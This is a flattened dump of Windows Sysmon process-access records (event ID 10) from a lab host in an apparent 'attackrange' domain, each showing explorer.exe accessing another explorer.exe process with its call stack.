16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 